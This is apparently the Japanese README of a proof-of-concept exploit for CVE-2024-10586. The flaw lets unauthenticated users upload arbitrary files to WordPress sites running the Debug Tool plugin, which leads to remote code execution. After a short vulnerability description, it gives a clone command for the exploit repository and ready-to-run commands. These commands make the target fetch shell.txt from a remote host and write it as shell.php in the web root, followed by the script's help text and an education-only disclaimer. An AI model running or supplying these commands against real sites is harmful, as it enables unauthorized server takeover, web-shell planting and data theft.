
CVE-2024-10586の概念実証エクスプロイト。WordPress Debug Toolプラグインを標的とします。認証されていないPOSTリクエストによる任意のファイルアップロードを自動化し、リモートコード実行につなげます。
説明
WordPress用Debug Toolプラグインは、dbt_pull_image()関数のケイパビリティチェックの欠如とファイルタイプ検証の欠如により、バージョン2.2までの全バージョンにおいて任意のファイル作成に対して脆弱です。
これにより、認証されていない攻撃者がリモートコード実行に悪用可能な.phpファイルなどの任意のファイルを作成できる可能性があります。
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
次のコマンドでスクリプトを実行します: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
このスクリプトは教育目的のみを意図しています。責任を持って使用し、所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。作者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。